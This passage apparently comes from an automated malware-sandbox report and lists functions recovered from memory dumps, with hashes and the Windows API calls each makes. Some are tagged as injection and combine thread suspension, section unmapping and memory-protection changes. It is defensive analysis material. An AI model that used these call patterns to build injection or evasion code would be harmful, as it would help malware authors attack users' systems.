  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
